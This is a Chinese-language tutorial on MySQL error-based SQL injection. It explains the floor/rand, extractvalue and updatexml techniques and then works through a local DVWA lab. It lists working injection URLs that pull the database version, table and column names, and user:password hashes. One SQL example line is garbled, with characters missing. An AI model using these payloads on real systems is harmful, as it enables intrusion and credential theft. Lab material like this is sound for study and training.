SQL报错注入: 使用SQL语句报错的语法,用于注入结果无回回显但错误信息有输出的情况。
MySQL报错注入主要分为一下几类:
1.BigInt等数据类型溢出;
2.Xpath语法错误;
3.count()+rand()+group_by()导致重复;
4.空间数据类型函数错误。
很多函数会导致MySQL报错并显示出数据:
1.floor函数:返回小于等该值的最大整数。floor(rand(0)*2)报错是有条件的,记录必须3条以上
2.extractvalue函数(最多32字符):使用xpath的语法从xml字符串中获取数据,使用concat函数将想要获得的数据库内容拼接到第二个参数中,报错时作为内容输出。
3.updatexml函数:返回被替换的xml片段,updatexml中存在特殊字符、字母时,会出现报错,报错信息为特殊字符、字母及之后的内容,而hex出的数据包含字母和数字,所以第一个字母前面的内容都会丢失,常与concat组合使用。
4.exp函数。
select count(),(floor(rand(0)2)) as x tables group by x;为什么会报错?
rand()在执行的时候,都会重新计算,会产生不同的数据,在语句的后面使用group by,整个表的数据是按照rand()生成的数据为主键,而插入到临时表中,如果碰到生成(floor(rand(0)*2)) as x的数据和表中的数据重复,就会造成主键重复的报错。
dvwa环境搭建
docker search web-dvwa
docker pull vulnerables/web-dvwa
docker run -d -p 12346:80 vulnerables/web-dvwa
在启动环境之后,输入用户名(admin)和密码(password),登录到系统,进入启动界面,在页面有一个create/reset database 按钮,点击之后,就可以重新登录到页面:
重新登录系统之后,选择SQL Injection(Bind),进入盲注页面,
在页面中,直接点击提交按钮,页面返回在数据库中没有找到相应的userid,可以尝试有盲注的可能性,
通过常用盲注的方式,可以进行简单测试,是否可以进行盲注。使用上面提到的方式进行盲注的测试:
http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1,(select @@version)) -- &Submit=Submit#
通过extractvalue函数获取到数据库的版本,使用concat将用户和数据库信息拼接到一起,在使用extractvalue 获取到数据,
http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,
(select user()),0x7e,(select database()))) -- &Submit=Submit#
可以获取到用户和数据库,从数据库中获取到数据表,以及获取到相应的数据:
http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) -- &Submit=Submit#
http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) -- &Submit=Submit#
从图中可以看到输出的数据不完整,可以借助limit来获取每一个属性的名称:
http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1))) -- &Submit=Submit#
可以得到users表的字段为:[user_id,first_name,last_name,user,password,avatar,last_login,failed_login]
通过上面的字段可以猜测出来,用户的信息,应该存放在user和password两个字段中,
http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e, (select
concat_ws(':',user,password) from dvwa.users limit 0,1))) -- &Submit=Submit#
这样获取到的数据有可能会超过字符串长度,需要使用mid函数,
http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, mid(concat(0x7e, (select password from dvwa.users limit 0,1)),1,29)) -- &Submit=Submit#
可以看到获取password的数据,有可能会超过长度限制进行截取,可以多次获取,然后将字段进行拼接,
